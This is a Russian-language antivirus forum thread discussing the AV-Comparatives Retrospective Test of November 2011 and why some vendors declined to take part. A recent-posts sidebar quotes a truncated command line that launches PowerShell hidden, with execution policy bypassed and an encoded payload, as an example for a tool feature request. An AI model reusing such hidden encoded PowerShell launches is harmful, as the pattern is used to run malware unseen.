Перейти к содержанию
Danilka

AV-comparatives.org: Retrospective Test November 2011

Recommended Posts

Александр Шабанов

Not Included: бюджет серьезно подорват :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
AlexxSun
AVG, K7, McAfee, PC Tools, Sophos, Symantec, Trend Micro and Webroot decided to not get included in this

test and to renounce to get awarded

:rolleyes: Чего это они так игнорят эту тестировочную контору? Неужели разочаровались в объективности результатов?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Вадим Волков
:rolleyes: Чего это они так игнорят эту тестировочную контору? Неужели разочаровались в объективности результатов?

Вообще-то, игнорят именно этот тест - Retrospective. В тесте "On-demand Detection" они все участвовали. Видимо результаты в Retrospective не слишком устраивают.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
DaTa

Скорее всего не устраивают. Например Symantec давно забил на этот тест, у него облако есть. Правда мне так и не ясно как они при помощи облака лечить собираются.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Burbulator
Правда мне так и не ясно как они при помощи облака лечить собираются.

Утилиты, плюс полные, а не интеллектуальные базы?

Вроде где-то проскакивало, что процедуры лечения будут перенесены (или уже перенесены) в полные базы, а эти "умные" описания будут содержать только сигнатуры.

Если я ничего не путаю

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
DaTa

Да Бог их знает. Сигнатуры по хэшу, по умолчанию не могут детектировать много. Судя по структуре баз у них все специальные процедуры лечения собраны в файле esrdef.bin который присутствует что в полных что в урезаных обновлениях. Но фактически триггерит процедуру лечения - детект, который то сигнатурный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×